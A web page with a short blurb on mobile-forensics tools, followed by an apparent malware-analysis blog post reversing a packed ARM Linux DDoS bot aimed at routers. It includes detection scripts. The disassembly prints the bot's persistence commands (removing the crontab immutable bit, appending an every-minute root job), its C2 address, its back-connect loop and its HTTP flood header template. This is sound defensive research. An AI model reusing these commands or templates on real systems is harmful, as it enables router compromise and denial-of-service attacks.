AccessData Mobile Phone Examiner (MPE) Plus: This tool supports more than 7,000 phones, including iOS, Android, BlackBerry, Windows Mobile and Chinese devices, and can be purchased as a hardware bundle with a SIM card reader and data cables. File systems are immediately viewable and can be parsed in MPE+ to locate lock codes, EXIF data and any other data contained in the phone's file system.


SIMpull: SIMpull is a SIM card acquisition application that acquires the entire contents of a SIM card, including deleted SMS messages, a feature not available in many other commercial SIM acquisition programs. SIMpull first determines whether the card is a GSM SIM or a 3G USIM, then performs a logical acquisition of all files defined in ETSI TS 151.011 (GSM) or ETSI TS 131.102 (USIM).


In SIMpull's output, each SMS entry shows the message text and its length, the sender's number, the service center address, and so on.


CREDIT:  Rohit Shaw – eforensicsmag

MMD-0026-2014 – Router Malware Warning | Reversing an ARM arch ELF Elknot (China DDoS malware)

The background

It is one of our active projects to monitor the China-origin ELF DDoS malware threat. The growth is very rapid nowadays: MMD has detected 5 active variants under almost 15 panels scattered across Chinese networks. I am quite active in supporting the team members of this project, so recently I reverse between 5 and 10 ELF binaries almost every day. They are not only aiming at servers with x32 or x64 architecture but also at router devices that run Linux. In some cases I have found FreeBSD variants.

In this story I faced an ARM architecture binary, which I found interesting, so I decided to share it here. The reasons: practically, it was designed to work on ARM routers by trimming down the well-known Linux/Elknot functions/features that I previously posted about in —>[-1-] [-2-] [-3-] [-4-] [-5-] [-6-], specifically to infect ARM (router) devices; this binary tries to convince you that it is a WindowsHelp binary 😀; and, from my reverse engineering point of view, ARM and Thumb assembly are interesting.
I know it is aiming at routers because of the way it uses the internet to connect directly to a remote global IP, the method used to grab data from a specific location in the embedded device, and the traces of the sources used during the compilation of the malware itself.

The malware

As usual, the Chinese actor(s) serve their malware binaries under a "specific panel", and this binary was spotted among other Linux/Elknot malware. It had been served since Sept 10th and had 4 downloads (including me, once).

The file looks like this:

$ ls -alF 1
-rwxr--r--  1 mmd  mmd  165,176 Sep 10 10:21 1
$ md5 1
MD5 (1) = 0bb68bd65d94f61b7b20117b99d8526c
$ file 1
1: ELF 32-bit LSB executable, ARM, version 1 (GNU/Linux), statically linked, stripped

Well, we know it is an ARM binary, but I need more information, so I checked the ELF composition:

  Entry point address:  "0x2f118"
  Start of program headers: "52" (bytes into file)
  Start of section headers: "0" (bytes into file)
  Flags: "0x4000002", has entry point, "Version4 EABI"
  Size of this header: "52" (bytes)
  Size of program headers: "32" (bytes)
  Number of program headers: "2"
  Size of section headers: "40" (bytes)
  Number of section headers: "0"
  Section header string table index: "0"
Program Headers:
  Type     Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD     "0x000000 0x00008000 0x00008000 0x282b1 0x282b1 R E 0x8000"
  LOAD     "0x000c24 0x000d0c24 0x000d0c24 0x00000 0x00000 RW  0x8000"

Now it's time to do the arithmetic: we know the file size, and the sizes of the two LOAD segments don't fit a normal binary (one executable segment covering almost the whole file and an empty RW segment). Further, I see no sections at all, neither dynamic nor static symbol data nor relocation data, which I would expect from an ARM ELF even when it is stripped, since stripping removes symbols but keeps the section headers. This is a sign of protection: someone wants to hide something, and in the end that person is hiding EVERYTHING, which is very suspicious 🙂. So the binary could be packed or wrapped in some encryption layer; there are many possibilities.

Packer

Let's check. I went to the entry point (0x2f118) and started doing the stuff I usually do, noting that we have to be very patient with ARM or Thumb assembly, since simple operations take more instructions than on an Intel processor.

;-- entry0:
0x0002f118  adr     r12, off_2f104           ; r12 -> parameter block used by the stub
0x0002f11c  ldmia   r12, {r1,r2,r10,r11,lr}
0x0002f120  add     r10, r10, r12
0x0002f124  add     r11, r11, r12
0x0002f128  mov     r0, r2
0x0002f12c  sub     r9, r12, r1
0x0002f130  add     r1, r1, #0x1000
0x0002f134  mov     r3, #0
0x0002f138  stmfd   sp!, {r0-r3,lr}
0x0002f13c  mov     r2, #7                   ; PROT_READ|PROT_WRITE|PROT_EXEC
0x0002f140  ldr     r3, [r12,#0x10]
0x0002f144  mov     r5, #0
0x0002f148  mov     r4, 0xffffffff           ; fd = -1 (anonymous mapping)
0x0002f14c  orr     r3, r3, #0x10            ; flags |= MAP_FIXED
0x0002f150  mov     r7, #0xc0                ; ARM EABI syscall 192 = mmap2
0x0002f154  svc     0
0x0002f158  cmn     r0, #0x1000              ; error if r0 is in -4095..-1
0x0002f15c  bcs     loc_0x02fbd0             ; -> print "PROT_EXEC|PROT_WRITE failed." and exit
  [...]

..following the register values, the string that ends up in r1 on the failure path tells what is happening:

0x0002fbd0  mov  r2, #0x1e            ; length = 30 bytes
0x0002fbd4  adr  r1, aprot_execprot_  ; "PROT_EXEC|PROT_WRITE failed.\n"
0x0002fbd8  mov  r0, #2               ; fd 2 = stderr
0x0002fbdc  mov  r7, #4               ; syscall 4 = write
0x0002fbe0  svc  0

That string may ring a bell too 🙂. OK, this ELF is protected; with/for what? I looked at the DCB data around where that string is referenced, and the answer is right there:

0x0002FBF0 aProt_execProt_ DCB "PROT_EXEC|PROT_WRITE failed.",0xA,0
0x0002FC0E                 DCB 0xA,0
0x0002FC10 aInfoThisFileIs DCB 0x24,"Info: This file is packed with the UPX executable packer http:/"
0x0002FC10                 DCB "/upx.sf.net ",0x24,0xA,0
0x0002FC5F aIdUpx3_91Copyr DCB 0x24,"Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights R"
0x0002FC5F                 DCB "eserved. ",0x24,0xA,0
0x0002FCAB                 DCB 0x0 ;; here goes the table..
0x0002FCAC                 DCD 0x9A8, 0x5F9, 0x500E, 0x6C00031A, 0x942C5302, 0x18D063CB
0x0002FCAC                 DCD 0x49382EE, 0xD185E779, 0x57399E2E, 0xD24C892F, 0x1003EA02
0x0002FCAC                 DCD 0x6A5A70C9, 0x2F701D6A, 0x6D0D9A7, 0xD2EC6754, 0x95ECE49
[...]                      [...]

Oh, silly me.. it is UPX. But is it a common, unmodified build? So I went back to the hex snapshot to confirm..

00000000  7f 45 4c 46 01 01 01 03  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 28 00 01 00 00 00  18 f1 02 00 34 00 00 00  |..(.........4...|
00000020  00 00 00 00 02 00 00 04  34 00 20 00 02 00 28 00  |........4.(.|
00000030  00 00 00 00 01 00 00 00  00 00 00 00 00 80 00 00  |................|
00000040  00 80 00 00 b1 82 02 00  b1 82 02 00 05 00 00 00  |................|
00000050  00 80 00 00 01 00 00 00  24 0c 00 00 24 0c 0d 00  |........$...$...|
00000060  24 0c 0d 00 00 00 00 00  00 00 00 00 06 00 00 00  |$...............|
00000070  00 80 00 00 93 cc 51 fc  55 50 58 21 b4 11 0d 17  |......Q.UPX!....|
00000080  00 00 00 00 58 64 08 00  58 64 08 00 d4 00 00 00  |....Xd..Xd......|

Since I know some moronz really watch this blog too, I don't want to be too specific about this, but from the hex above (the "UPX!" signature right after the program headers, followed by the stub's size fields) we can recognise whether this UPX header is the original one, which it is. Otherwise you have to patch it before unpacking; a sample of how to unpack a custom UPX is here–>[LINK]. Further.. as this is the common UPX, and the "U" stands for universal, we can use the "universal" solution (the stock upx tool's -d option) to unpack it 🙂

549976 <-    165176   30.03%   linux/armel   unpacked.1

So now we have the bigger file 😀
This time let's check the composition again:

00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 28 00 01 00 00 00  10 81 00 00 34 00 00 00  |..(.........4...|
00000020  f8 5f 08 00 02 00 00 04  34 00 20 00 05 00 28 00  |._......4.(.|
00000030  1c 00 1b 00 01 00 00 70  5c bb 07 00 5c 3b 08 00  |.......p\...\;..|
00000040  5c 3b 08 00 00 09 00 00  00 09 00 00 04 00 00 00  |\;..............|
00000050  04 00 00 00 01 00 00 00  00 00 00 00 00 80 00 00  |................|
00000060  00 80 00 00 dc c4 07 00  dc c4 07 00 05 00 00 00  |................|
00000070  00 80 00 00 01 00 00 00  dc c4 07 00 dc c4 08 00  |................|
00000080  dc c4 08 00 4c 0a 00 00  48 47 04 00 06 00 00 00  |....L...HG......|
00000090  00 80 00 00 04 00 00 00  d4 00 00 00 d4 80 00 00  |................|
000000a0  d4 80 00 00 20 00 00 00  20 00 00 00 04 00 00 00  |........|
000000b0  04 00 00 00 07 00 00 00  dc c4 07 00 dc c4 08 00  |................|
000000c0  dc c4 08 00 14 00 00 00  30 00 00 00 04 00 00 00  |........0.......|
000000d0  04 00 00 00 04 00 00 00  10 00 00 00 01 00 00 00  |................|
000000e0  47 4e 55 00 00 00 00 00  02 00 00 00 06 00 00 00  |GNU.............|

Yeah, the "GNU" ASCII (the name of the .note.ABI-tag note) appears now. And see more details below:

Entry point address: "0x8110"
Start of program headers:  "52" (bytes into file)
Start of section headers:  "548,856" (bytes into file)
Flags:   "0x4000002", has entry point, "Version4 EABI"
Size of this header: "52" (bytes)
Size of program headers:   "32" (bytes)
Number of program headers:   "5"
Size of section headers:   "40" (bytes)
Number of section headers:   "28"
Section header string table index: "27"

Good! The true EP is shown now. And we have the new program headers too:

Type     Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
EXIDX    "0x07bb5c 0x00083b5c 0x00083b5c 0x00900 0x00900" R   0x4
LOAD     "0x000000 0x00008000 0x00008000 0x7c4dc 0x7c4dc" R E 0x8000
LOAD     "0x07c4dc 0x0008c4dc 0x0008c4dc 0x00a4c 0x44748" RW  0x8000
NOTE     "0x0000d4 0x000080d4 0x000080d4 0x00020 0x00020" R   0x4
TLS      "0x07c4dc 0x0008c4dc 0x0008c4dc 0x00014 0x00030" R   0x4
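
The two header dumps above can be checked with a few lines of Python. The following is an added example written for this page (it is not MalwareMustDie's tooling): it transcribes the bytes shown in the two hex dumps, parses the ELF32 header and program headers the way readelf -h / -l does, applies the "is it packed?" tells discussed above plus one more (an entry point sitting in the last part of the executable segment, where a packer stub lives), and reads the original file size that UPX records in its p_info block immediately after the program headers, which is where the unpacker's "549976 <- 165176" comes from. The l_info/p_info layout is taken from the UPX sources; the 165176-byte packed size is from the ls output earlier in the post.

```python
import struct

# Leading bytes of the packed sample (0x00..0x8f) and of the unpacked file (0x00..0xef),
# transcribed from the two hex dumps reproduced in this post.
PACKED_HEAD = bytes.fromhex(
    "7f454c4601010103" "0000000000000000" "0200280001000000" "18f1020034000000"
    "0000000002000004" "3400200002002800" "0000000001000000" "0000000000800000"
    "00800000b1820200" "b182020005000000" "0080000001000000" "240c0000240c0d00"
    "240c0d0000000000" "0000000006000000" "0080000093cc51fc" "55505821b4110d17"
    "0000000058640800" "58640800d4000000")
UNPACKED_HEAD = bytes.fromhex(
    "7f454c4601010100" "0000000000000000" "0200280001000000" "1081000034000000"
    "f85f080002000004" "3400200005002800" "1c001b0001000070" "5cbb07005c3b0800"
    "5c3b080000090000" "0009000004000000" "0400000001000000" "0000000000800000"
    "00800000dcc40700" "dcc4070005000000" "0080000001000000" "dcc40700dcc40800"
    "dcc408004c0a0000" "4847040006000000" "0080000004000000" "d4000000d4800000"
    "d480000020000000" "2000000004000000" "0400000007000000" "dcc40700dcc40800"
    "dcc4080014000000" "3000000004000000" "0400000004000000" "1000000001000000"
    "474e550000000000" "0200000006000000")

EHDR32 = struct.Struct("<16sHHIIIIIHHHHHH")   # Elf32_Ehdr, little-endian
PHDR32 = struct.Struct("<8I")                 # Elf32_Phdr
PT_NAMES = {1: "LOAD", 4: "NOTE", 7: "TLS", 0x70000001: "EXIDX"}


def parse_elf32(data):
    """Parse an ELF32 header plus its program headers (the readelf -h / -l view)."""
    (ident, _type, machine, _ver, entry, phoff, shoff, flags, _ehsize,
     phentsize, phnum, _shentsize, shnum, shstrndx) = EHDR32.unpack_from(data, 0)
    if ident[:4] != b"\x7fELF" or ident[4] != 1 or ident[5] != 1:
        raise ValueError("not a little-endian ELF32 file")
    phdrs = []
    for i in range(phnum):
        p_type, off, vaddr, _paddr, filesz, memsz, p_flags, align = PHDR32.unpack_from(
            data, phoff + i * phentsize)
        phdrs.append(dict(type=PT_NAMES.get(p_type, "0x%x" % p_type), offset=off,
                          vaddr=vaddr, filesz=filesz, memsz=memsz, flags=p_flags, align=align))
    return dict(machine=machine, entry=entry, flags=flags, phnum=phnum,
                shoff=shoff, shnum=shnum, shstrndx=shstrndx, phdrs=phdrs)


def packing_indicators(elf):
    """The tells used in the post (no section headers, only two segments, an empty
    RW segment) plus an entry point in the last 10% of the executable segment."""
    hits = []
    if elf["shnum"] == 0:
        hits.append("no section headers")
    if elf["phnum"] < 3:
        hits.append("only %d program headers" % elf["phnum"])
    for p in elf["phdrs"]:
        if p["type"] == "LOAD" and p["memsz"] == 0:
            hits.append("empty LOAD segment at 0x%x" % p["vaddr"])
        if p["type"] == "LOAD" and p["flags"] & 1 and p["filesz"]:
            if elf["entry"] - p["vaddr"] > 0.9 * p["filesz"]:
                hits.append("entry point in the last 10% of the text segment")
    return hits


def upx_original_size(data):
    """Original size recorded by UPX, or None when there is no UPX! marker.
    Layout (from the UPX sources): l_info {l_checksum u32, l_magic 'UPX!', l_lsize u16,
    l_version u8, l_format u8} immediately followed by p_info {p_progid u32,
    p_filesize u32, p_blocksize u32}."""
    pos = data.find(b"UPX!")
    if pos < 4:
        return None
    _progid, p_filesize, _blocksize = struct.unpack_from("<3I", data, pos - 4 + 12)
    return p_filesize


if __name__ == "__main__":
    for name, blob in (("packed", PACKED_HEAD), ("unpacked", UNPACKED_HEAD)):
        elf = parse_elf32(blob)
        print("%s: entry=0x%x phnum=%d shnum=%d shoff=%d" % (
            name, elf["entry"], elf["phnum"], elf["shnum"], elf["shoff"]))
        for p in elf["phdrs"]:
            print("  %-5s off=0x%06x vaddr=0x%08x filesz=0x%05x memsz=0x%05x flg=%d" % (
                p["type"], p["offset"], p["vaddr"], p["filesz"], p["memsz"], p["flags"]))
        print("  indicators:", packing_indicators(elf) or "none")
    orig = upx_original_size(PACKED_HEAD)
    print("UPX p_filesize = %d bytes (packed 165176 = %.2f%%)" % (orig, 100.0 * 165176 / orig))
```

On a modified UPX build the "UPX!" magic is usually the first thing that gets patched out, so a None from upx_original_size while the other indicators fire is exactly the case the post warns about, where the header has to be repaired before the stock unpacker will accept it.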

A quick calculation of the sizes above shows that the segments now account for more than 80% of the actual file size, good enough. It shows we have unprotected/unpacked data, so I can expect good material to disassemble, but first let's dump the sections to be sure there is no further encryption/protection:

.note.ABI-tag
.init
.fini
.init_array
.fini_array
__libc_freeres_fn
__libc_thread_freeres_fn
__libc_freeres_ptrs
__libc_subfreeres
__libc_atexit
__libc_thread_subfreeres
.text
.rodata
.ARM.extab
.ARM.exidx
.ARM.attributes
.eh_frame
.jcr
.data.rel.ro
.got
.data
.bss
.note.ABI-tag
.tdata
.tbss

All are there! So, after a small additional confirmation, these are the sections I picked to start the analysis:

Name               Addr     Off    Size
-------------------------------------------
.text              0x08110 0x00110 0x6605c
.rodata            0x6f008 0x67008 0x149a0
__libc_freeres_fn  0x6e16c 0x6616c 0x00df4

Verdict on its malicious behaviour by reverse engineering

I will go through the reversing highlights, meaning the most important processes only. I don't write up the sub-functions, i.e. how it grabs the ethernet data or how this malware uses a socket to connect to an IP, since the code is too long. But to be noted: since the ARM architecture is structured differently from Intel, and ARM is designed for embedded systems, you will see many different methods for the detailed operations that involve system calls.
OK, here are the highlights that I would like to cover:

1. Installation:

The malware changes the attributes of /etc/crontab and chmods it. This is a rather specific setup that is rarely found in previous Elknot types, suggesting a new build; previously most of them aimed at autostart through xinetd. Note the order of the commands: chattr -i first strips the immutable bit that some administrators set on /etc/crontab, so that bit is no defence against a process already running as root. What it leaves behind, an /etc/crontab that is suddenly writable and no longer immutable, is itself a change worth alerting on.

.text:0x0A760  STMFD   SP!, {R4-R8,LR}
.text:0x0A764  SUB  SP, SP, #0x208              ; 0x100-byte command buffer at SP+0x108
.text:0x0A768  ADD  R7, SP, #0x108
.text:0x0A76C  MOV  R4, R0                      ; R0, R1 = the two arguments from the caller at 0x0831C (R1 = "mt")
.text:0x0A770  MOV  R8, R1
.text:0x0A774  MOV  R0, R7
.text:0x0A778  MOV  R1, #0x100
.text:0x0A77C  BL   sub_0x026FB0                ; called as (buf, 0x100): clears the buffer
.text:0x0A780  LDR  R0,  <-- "chattr -i /etc/crontab"
.text:0x0A784  BL   sub_0x0E3E0                 ; runs the shell command string (system()-style)
.text:0x0A788  LDR  R0, <-- "chmod +w /etc/crontab"

Adding the autostart entry to it, first deleting any earlier line that matches the malware's own name with sed, then appending a job that runs every minute as root:

.text:0x0A7DC ; xref: sub_0x0A760
.text:0x0A7DC  LDR  R1, <-- "sed -i '/%s/d' /etc/crontab"
.text:0x0A7E0  MOV  R2, R5
.text:0x0A7E4  MOV  R0, R6
   :
.text:0x0A800  LDR  R1, <-- "echo '*/1 * * * * root %s/%s %s' >> /etc/crontab"
.text:0x0A804  STR  R8, [SP,#0x108+var_108]
.text:0x0A808  BL   sub_0x0182DC
.text:0x0A80C  MOV  R0, R6
.text:0x0A810  BL   sub_0x0E3E0

Creating the file "/etc/.mysys", which later turns out to be the self-copy attempt:

.text:0x0A83C  STR  LR, [SP,#var_4]!
.text:0x0A840  MOV  R1, #0x42                   ; O_RDWR|O_CREAT
.text:0x0A844  SUB  SP, SP, #4
.text:0x0A848  LDR  R0, <-- "/etc/.mysys"
.text:0x0A84C  BL   sub_0x0E350                 ; open(path, flags); the same routine is used on "/dev/null" in section 2
.text:0x0A850  CMP  R0, #0
.text:0x0A854  MOV  R1, #6
.text:0x0A858  BGT  loc_0x0A86C                 ; fd > 0: the file was created

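The persistence above leaves a recognisable shape in /etc/crontab: a root job on a "*/1 * * * *" schedule that launches something from a hidden path. The following Python is an added detection example written for this page (not part of the original post or of MMD's tooling); it parses a constructed system crontab, built from the stock Ubuntu job lines plus one line in the shape of the format string the binary uses, and flags jobs that match. The path /etc/.mysys/WinHelp32.exe and the argument "mt" in the constructed line are made up for the example; the binary's real file name is not recoverable from the listing above.

```python
import re

# Constructed system crontab: stock Ubuntu job lines plus one line in the shape of
# the format string this sample appends ('*/1 * * * * root %s/%s %s'). The path and
# the argument are invented for the example, not taken from the binary.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
25 6\t* * *\troot\ttest -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 * * * * root /etc/.mysys/WinHelp32.exe mt
"""

# System crontab lines carry a user field between the schedule and the command.
JOB_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
HIDDEN_COMPONENT = re.compile(r"(^|/)\.[^/\s]+")            # /etc/.mysys, /tmp/.x, ...
SCRATCH_DIRS = re.compile(r"^/(etc|tmp|var/tmp|dev/shm)/")  # no package installs executables here


def parse_system_crontab(text):
    """Yield (minute, hour, dom, mon, dow, user, command) for each job in a system crontab."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGNMENT.match(line):
            continue          # blank lines, comments and VAR=value settings are not jobs
        m = JOB_LINE.match(line)
        if m:
            yield m.groups()


def suspicious_jobs(text):
    """Return [(command, [reasons])] for root jobs that look like this sample's persistence."""
    hits = []
    for minute, hour, _dom, _mon, _dow, user, command in parse_system_crontab(text):
        program = command.split()[0]
        reasons = []
        if minute in ("*", "*/1") and hour == "*":
            reasons.append("runs every minute")
        if HIDDEN_COMPONENT.search(program):
            reasons.append("hidden path component")
        scratch = SCRATCH_DIRS.match(program)
        if scratch:
            reasons.append("executable under " + scratch.group(0))
        if user == "root" and reasons:
            hits.append((command, reasons))
    return hits


if __name__ == "__main__":
    for command, reasons in suspicious_jobs(SAMPLE_CRONTAB):
        print("SUSPICIOUS: %-45s %s" % (command, ", ".join(reasons)))
```

On a live box, pair this with lsattr /etc/crontab: a crontab that used to carry the immutable bit and no longer does, or whose mode has changed, is the other trace this installer leaves.
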
2. Initiation of the service... which leads to the CNC information 🙂

We'll see "/dev/null" opened three times with O_RDWR (R1 = 2), the usual way a daemon replaces its stdin, stdout and stderr before detaching; this is typical MO for most types of Linux/Elknot I have seen.

.text:0x082E0  LDR  R0, <-- "/dev/null"
.text:0x082E4  BL   sub_0x0E350 ;              ; open("/dev/null", ...)
.text:0x082E8  MOV  R1, #2                     ; O_RDWR
.text:0x082EC  LDR  R0, <-- "/dev/null"
.text:0x082F0  BL   sub_0x0E350
.text:0x082F4  MOV  R1, #2
.text:0x082F8  LDR  R0, <-- "/dev/null"
.text:0x082FC  BL   sub_0x0E350

..followed by the "efforts" to start the service: the crontab installer from section 1 is called with "mt", a status string is printed, and three worker threads are created:

.text:0x0831C  LDR  R0, [R5]
.text:0x08320  LDR  R1, <-- "mt"
.text:0x08324  BL   sub_0x0A760                ; the crontab installer from section 1
.text:0x08328  MOV  R0, #1
.text:0x0832C  MOV  R1, R0
.text:0x08330  BL   sub_0x01614C
.text:0x08334  LDR  R0, <-- reg R0 = "Int Server..."
.text:0x08338  BL   sub_0x018F2C                ; prints the status string (puts/printf-style)
.text:0x0833C  MOV  R1, R4
.text:0x08340  MOV  R3, R4
.text:0x08344  LDR  R2, =sub_0x08A60            ; thread entry #1
.text:0x08348  LDR  R0, =unk_0x0D0990
.text:0x0834C  BL   sub_0x0B33C                 ; pthread_create-style: (&tid, attr, start_routine, arg)
.text:0x08350  MOV  R1, R4
.text:0x08354  MOV  R3, R4
.text:0x08358  LDR  R2, =sub_0x088D8            ; thread entry #2
.text:0x0835C  LDR  R0, =unk_0x0D0988
.text:0x08360  BL   sub_0x0B33C
.text:0x08364  MOV  R1, R4
.text:0x08368  MOV  R3, R4
.text:0x0836C  LDR  R2, =sub_0x08598            ; thread entry #3
.text:0x08370  LDR  R0, =unk_0x09097C
.text:0x08374  BL   sub_0x0B33C
.text:0x08378  MOV  R1, R4
.text:0x0837C  MOV  R3, R4

To connect to "something". I trailed it to get all the variables needed:

.text:0x08394  LDR  R0, <-- RO contains "connect to server..."
.text:0x08398  BL   sub_0x018F2C
.text:0x0839C  MOV  R1, #0
.text:0x083A0  MOV  R3, R1
.text:0x083A4  LDR  R2, =sub_0x0A038 <--"jump here"
       [...]
.text:0x0A038  STMFD   SP!, {R4-R10,LR}
.text:0x0A03C  SUB     SP, SP, #0x9C0
.text:0x0A040  BL      sub_0x09E68 <--"jump again here"

And at the destination, 0x09E68, there is the IP address of this connection.

.text:0x09E68 LDR  R0, =unk_0x08C5C4  <-- address to get the CNC IP Address
.text:0x09E68 <-- go down to hard-copied data:0x08C5C8 it's the IP "182.254.180.241"

Now we know the CNC is in 182.254.180.241 which is in:

ASN: 45090 / CNNIC-TENCENT-NET
PREFIX: 182.254.180.0/23
ISP: COMSENZ TECHNOLOGY LTD
COUNTRY: CHINA

..well, I am not surprised.

3. An effort to fake Windows Help (WinHelp.exe) service 🙂

Continuing the data flow started above, I ended up facing some interesting data:

   :
.text:0x09E68 LDR  R0, =unk_0x08C5C4
.text:0x09E6C STMFD   SP!, {R4-R8,R10,LR}
.text:0x09E70 LDR  R2, [R0,#(dword_0x08C62C - 0x08C5C4)]

The data after the dword at .data:0x08C62C, at .data:0x08C630 (DCB), is "WinHelp32.exe"; see it here if you don't believe me:

This is just unbelievable. Seeking further to figure out what this is, I found the complete set of data for this "fake process", which is self-explanatory:

I don’t know what to say about this..

4. PoC of the backdoor and of sending sensitive data to a remote host:

It's self-explanatory in the code below, the BackConnect part:

.text:0x08420 ; .text:off_0x08408
.text:0x08420  STMFD   SP!, {R4,LR}
.text:0x08424  LDR  R4, =dword_0x0D0984
.text:0x08428
.text:0x08428 ; xref: sub_0x08420
.text:0x08428  LDR  R0, <---- "Back connect to server..."
.text:0x0842C  BL   sub_0x018F2C                ; prints the status string
.text:0x08430  MOV  R1, #0
.text:0x08434  MOV  R3, R1
.text:0x08438  LDR  R2, =sub_0x099E0            ; back-connect thread routine
.text:0x0843C  LDR  R0, =dword_0x0D0984
.text:0x08440  BL   sub_0x0B33C                 ; pthread_create-style, as in section 2
.text:0x08444  MOV  R1, #0
.text:0x08448  LDR  R0, [R4]
.text:0x0844C  BL   sub_0x0C4FC
.text:0x08450  LDR  R0, [R4]
.text:0x08454  BL   sub_0x0E070
.text:0x08458  LDR  R0, =0x4C4B40               ; 5,000,000
.text:0x0845C  BL   sub_0x0272F0                ; usleep-style delay, i.e. 5 seconds (assumption)
.text:0x08460  B    loc_0x08428                 ; loop forever: reconnect every few seconds

And the trace of the information to be sent to the remote host:

.text:0x08500  STMFD   SP!, {R4,R5,LR}
.text:0x08504  LDR  R1, =dword_0x090980
.text:0x08508  SUB  SP, SP, #0x400               ; 0x400-byte message buffer
.text:0x0850C  SUB  SP, SP, #0xC
.text:0x08510  LDR  R2, =dword_0x090978
.text:0x08514  LDR  R12, [R1]                    ; second %d
.text:0x08518  ADD  R4, SP, #0x418+var_410
.text:0x0851C  LDR  R3, [R2]                     ; first %d
.text:0x08520  MOV  R1, #0x400
.text:0x08524  LDR  R2  <--- "INFO:%d|%d"
.text:0x08528  MOV  R0, R4
.text:0x0852C  STR  R12, [SP,#0x418+var_418]    ; 5th argument goes on the stack (ARM EABI)
.text:0x08530  BL   sub_0x0182B0                 ; snprintf-style: (buf, 0x400, fmt, ...)
.text:0x08534  LDR  R3, =dword_0x08CF44
.text:0x08538  MOV  R0, R4
.text:0x0853C  LDR  R5, [R3]                     ; fd #1
.text:0x08540  BL   sub_0x024540                 ; strlen-style (the same routine measures the Host name in section 5)
.text:0x08544  MOV  R1, R4
.text:0x08548  ADD  R2, R0, #1                   ; length + terminating NUL
.text:0x0854C  MOV  R0, R5
.text:0x08550  BL   sub_0x0DF10                  ; send/write-style: (fd, buf, len)
.text:0x08554  LDR  R3, =dword_0x08CF48
.text:0x08558  MOV  R0, R4
.text:0x0855C  LDR  R5, [R3]                     ; fd #2
.text:0x08560  BL   sub_0x024540
.text:0x08564  MOV  R1, R4
.text:0x08568  ADD  R2, R0, #1
.text:0x0856C  MOV  R0, R5
.text:0x08570  BL   sub_0x0DF10                  ; the same string goes out on both descriptors
.text:0x08574  ADD  SP, SP, #0xC
.text:0x08578  ADD  SP, SP, #0x400
.text:0x0857C  LDMFD   SP!, {R4,R5,LR}
.text:0x08580  BX   LR

5. The HTTP header used for the DoS activity:

This is the function called when performing DoS over HTTP. I pasted it here as PoC of the DDoS'er, please bear with the length:

.text:0x0A548  LDR  R1 <--- " HTTP/1.1\r\n"
.text:0x0A54C  MOV  R2, #0xB                    ; 11 = strlen(" HTTP/1.1\r\n")
.text:0x0A550  ADD  R0, R8, R5                  ; R8 = request buffer, R5 = write offset
.text:0x0A554  BL   sub_0x0252B8                ; memcpy-style: (dst, src, len)
.text:0x0A558  ADD  R0, R5, #0xB
.text:0x0A55C  LDR  R1 <--- "Accept: text/html, application/xhtml+xml, */*\r\n"
.text:0x0A560  MOV  R2, #0x2F
.text:0x0A564  ADD  R0, R8, R0
.text:0x0A568  BL   sub_0x0252B8
.text:0x0A56C  ADD  R0, R5, #0x3A
.text:0x0A570  LDR  R1 <--- "Accept-Language: zh-CN\r\n"
                      "↑note the Chinese locale in the Accept-Language header↑"
.text:0x0A574  MOV  R2, #0x18
.text:0x0A578  ADD  R0, R8, R0
.text:0x0A57C  BL   sub_0x0252B8
.text:0x0A580  ADD  R0, R5, #0x52
.text:0x0A584  LDR  R1 <--- "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
.text:0x0A588  MOV  R2, #0x55
.text:0x0A58C  ADD  R0, R8, R0
.text:0x0A590  BL   sub_0x0252B8
.text:0x0A594  ADD  R0, R5, #0xA7
.text:0x0A598  LDR  R1 <--- "Accept-Encoding: gzip, deflate\r\n"
.text:0x0A59C  MOV  R2, #0x20
.text:0x0A5A0  ADD  R0, R8, R0
.text:0x0A5A4  BL   sub_0x0252B8
.text:0x0A5A8  ADD  R0, R5, #0xC7
.text:0x0A5AC  LDR  R1 <--- "Host: "
.text:0x0A5B0  MOV  R2, #6
.text:0x0A5B4  ADD  R0, R8, R0
.text:0x0A5B8  BL   sub_0x0252B8
.text:0x0A5BC  MOV  R0, R9                      ; R9 = target host name
.text:0x0A5C0  BL   sub_0x024540                ; strlen-style
.text:0x0A5C4  ADD  R5, R5, #0xCD               ; 0xCD = total length of the six fixed fragments above
.text:0x0A5C8  ADD  R4, R8, R5
.text:0x0A5CC  MOV  R2, R0
.text:0x0A5D0  MOV  R1, R9
.text:0x0A5D4  MOV  R0, R4
.text:0x0A5D8  BL   sub_0x0252B8                ; copy the host name after "Host: "
.text:0x0A5DC  MOV  R0, R9
.text:0x0A5E0  BL   sub_0x024540
.text:0x0A5E4  ADD  R5, R5, R0
.text:0x0A5E8  LDR  R1 <--- "\r\nConnection: Keep-Alive\r\n"
.text:0x0A5EC  MOV  R2, #0x1A
.text:0x0A5F0  ADD  R0, R8, R5
.text:0x0A5F4  BL   sub_0x0252B8
.text:0x0A5F8  ADD  R0, R5, #0x1A
.text:0x0A5FC  MOV  R2, #0x14
.text:0x0A600  LDR  R1 <--- "Pragma: no-cache\r\n\r\n"
.text:0x0A604  ADD  R0, R8, R0
.text:0x0A608  BL   sub_0x0252B8
.text:0x0A60C  MOV  R1, #1
.text:0x0A610  MOV  R0, #0xD
.text:0x0A614  BL   sub_0x01614C
.text:0x0A618  MOV  R0, R10                     ; R10 = socket
.text:0x0A61C  MOV  R1, R8
.text:0x0A620  ADD  R2, R5, #0x2E               ; length: offset after the host name + 0x1A + 0x14
.text:0x0A624  MOV  R3, #0
.text:0x0A628  BL   sub_0x0E1D0                 ; send-style: (sock, buf, len, flags=0)
   :    ;
